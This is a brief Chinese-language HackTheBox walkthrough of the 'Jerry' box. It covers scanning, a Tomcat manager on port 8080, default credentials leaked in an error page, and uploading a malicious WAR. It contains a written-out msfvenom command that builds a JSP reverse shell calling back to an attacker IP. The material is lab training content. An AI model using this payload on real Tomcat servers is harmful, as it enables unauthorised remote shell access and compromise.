Jerry - HackTheBox

nmap扫描

就一个8080的tomcat端口，访问

猜一下弱口令

admin:admin跳转了

貌似不对

错误页面爆出了默认密码，尝试一下

msf生成一个反弹shell的war包

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=7777 -f war -o shell.war

上传

没找到root.txt和user.txt，只有一个这个2 for the price of 1.txt

直接读取读不出来

用通配符读取一下